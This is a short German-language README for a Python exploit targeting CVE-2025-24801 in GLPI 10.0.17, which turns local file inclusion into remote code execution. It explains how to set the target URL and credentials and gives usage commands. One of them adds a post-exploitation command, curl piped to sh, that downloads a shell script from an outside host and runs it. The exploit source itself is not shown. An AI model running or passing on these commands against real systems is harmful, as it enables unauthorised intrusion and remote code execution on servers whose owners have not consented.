
Python-Exploit für CVE-2025-24801, das Remote Code Execution via Local File Inclusion in GLPI 10.0.17 erreicht. Beinhaltet einen Befehlsausführungsmodus für die Post-Exploitation.
Dieser Exploit nutzt CVE-2025-24801, um Remote Code Execution (RCE) über Local File Inclusion (LFI) bei GLPI 10.0.17 zu erreichen. Proof of Concept (PoC) dieser CVE mit Erklärung dieser Schwachstelle in GLPI.
Manche Anwendungen legen den /glpi/-Endpunkt offen (z.B. http://172.16.11.130:8080/glpi/front/computer.form.php). Wenn die Zielanwendung diesen Endpunkt enthält, muss dieser dem --url-Parameter hinzugefügt werden (z.B. --url http://172.16.11.130:8080/glpi).
Beispiel zur Nutzung.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
Wenn Sie diesen Exploit bereits ausgeführt und RCE ausgelöst haben, können Sie den Parameter --cmd verwenden, um nur den Befehl auszuführen.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"